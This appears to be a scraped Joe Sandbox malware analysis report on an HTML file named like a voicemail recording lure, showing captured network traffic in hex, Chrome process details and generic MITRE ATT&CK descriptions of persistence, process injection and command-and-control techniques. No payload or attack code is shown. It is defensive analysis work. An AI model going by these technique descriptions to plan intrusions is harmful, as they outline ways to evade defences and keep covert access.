2025-01-07 15:03:17 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 6a 55 6c 39 65 49 6c 68 45 47 61 42 4c 6b 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 39 31 38 35 61 38 39 32 62 65 38 38 61 39 32 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: zjUl9eIlhEGaBLkc.1Context: b9185a892be88a92
2025-01-07 15:03:17 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-07 15:03:17 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 6a 55 6c 39 65 49 6c 68 45 47 61 42 4c 6b 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 39 31 38 35 61 38 39 32 62 65 38 38 61 39 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 68 44 55 6b 50 71 78 56 2b 33 73 6b 6d 5a 33 65 69 6b 66 62 62 70 61 38 57 32 69 55 4d 66 33 42 5a 78 56 38 33 4d 75 73 78 6d 35 66 78 76 54 6c 6b 6d 6c 5a 6d 56 67 6e 30 6a 77 4a 61 56 48 6d 79 74 75 35 4a 6e 68 67 6a 73 53 68 47 4b 2b 6d 63 51 41 4a 59 77 58 77 77 69 47 31 6c 76 6d 2f 75 4d 54 6c 79 41 76 6b 61 37 6d 42 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zjUl9eIlhEGaBLkc.2Context: b9185a892be88a92<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbhDUkPqxV+3skmZ3eikfbbpa8W2iUMf3BZxV83Musxm5fxvTlkmlZmVgn0jwJaVHmytu5JnhgjsShGK+mcQAJYwXwwiG1lvm/uMTlyAvka7mB
2025-01-07 15:03:17 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 7a 6a 55 6c 39 65 49 6c 68 45 47 61 42 4c 6b 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 39 31 38 35 61 38 39 32 62 65 38 38 61 39 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: zjUl9eIlhEGaBLkc.3Context: b9185a892be88a92<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-07 15:03:17 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-07 15:03:17 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 2f 50 77 73 2f 48 34 65 58 55 57 58 64 33 35 38 50 2f 64 4b 78 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: /Pws/H4eXUWXd358P/dKxw.0Payload parsing failed.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 3204, Parent PID: 356

General

Target ID:	1
Start time:	10:01:03
Start date:	07/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\vRecording__0023secs__Stgusa.html"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6216, Parent PID: 3204

General

Target ID:	3
Start time:	10:01:06
Start date:	07/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,6140219841670570402,17466484337215704868,262144 /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vRecording__0023secs__Stgusa.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3204, Parent PID: 356

General

Chronological Activities

Analysis Process: chrome.exePID: 6216, Parent PID: 3204

General

Chronological Activities

Disassembly

Windows Analysis Report
vRecording0023secsStgusa.html